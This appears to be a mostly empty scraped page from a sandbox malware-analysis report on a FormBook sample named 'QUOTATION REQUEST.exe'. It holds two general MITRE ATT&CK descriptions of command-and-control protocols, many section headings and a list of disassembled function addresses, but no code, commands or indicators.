Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041839F, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182EF, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON